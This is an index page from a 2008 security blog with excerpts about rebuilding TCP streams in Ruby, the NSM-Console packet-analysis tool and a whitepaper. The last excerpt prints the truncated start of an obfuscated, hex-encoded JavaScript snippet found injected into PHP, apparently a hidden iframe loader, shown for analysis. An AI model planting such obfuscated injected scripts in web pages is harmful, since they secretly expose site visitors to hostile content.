  • The Strange Case of Yousif Yalda, an addendum

    March 28, 2008

    For people who follow the McGrewSecurity.com blog by Wesley McGrew, you are no doubt familiar with an “internet user” by the name of Yousif Yalda. For a little background, take a read on Wesley’s post on some of the “business tactics” of Yousif. Seeing as how this is the internet, and we’re all entitled to […]

  • Rebuilding TCP streams with Ruby part 2: fuzzysort

    March 19, 2008

    This is part 2 of a series on rebuilding TCP streams using Ruby; for more information, visit the previous post: Rebuilding TCP streams with Ruby part 1: fuzzymatch. In my previous post, I talked about using fuzzy sequence/acknowledge numbers to split a network capture file into streams. Using fuzzymatch was pretty successful for cutting streams […]

  • NSM-Console version 0.6 release

    March 14, 2008

    I’m happy to announce the release of the next version of NSM-Console, version 0.6. If you are unfamiliar with NSM-Console, here’s the synopsis from the project page: NSM-Console (Network Security Monitoring Console) is a framework for performing analysis on packet capture files. It implements a modular structure to allow for an analyst to quickly write […]

  • Rebuilding TCP streams with Ruby part 1: fuzzymatch

    March 11, 2008

    I have undertaken the (not so small) task of attempting to use Ruby to rebuild TCP data streams. I was originally planning on using ruby-libnids, but after running into considerable trouble with dynamic library linking on OSX, I decided it’d be a good experiment to write my own. This is not a small feat. In […]

  • First published paper on NSM-Console

    March 9, 2008

    I’ve written a whitepaper on some of the ideas behind NSM-Console. It also explains some of the basics of usage and what it was originally designed for; you can download the whitepaper directly or get it from the papers section on my site. Excerpt from the abstract: “With the proliferation of dozens of different packet […]

  • Obfuscated javascript fun

    March 5, 2008

    A friend of mine (thanks Legit) turned me on to this piece of javascript found in the midst of some PHP: <script language="JavaScript"> var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 = "\x38\x30\x68\x72\x36\x3a\x20\x3b\x21\x30"; var2 = "\x27\x72\x75\x26\x27\x36\x68\x72\x3d\x21"; var3 = "\x21\x25\x6f\x7a\x7a\x33\x27\x34\x38\x30"; var4 = "\x26\x21\x34\x21\x7b\x3b\x30\x21\x7a\x3c"; var5 = "\x3b\x31\x30\x2d\x67\x7b\x25\x3d\x25\x72"; var6 = "\x75\x3d\x30\x3c\x32\x3d\x21\x68\x72\x64"; var7 = "\x63\x72\x75\x22\x3c\x31\x21\x3d\x68\x72"; var8 = "\x64\x63\x72\x75\x33\x27\x34\x38\x30\x37"; var9 = "\x3a\x27\x31\x30\x27\x68\x72\x65\x72\x75"; var10 = […]
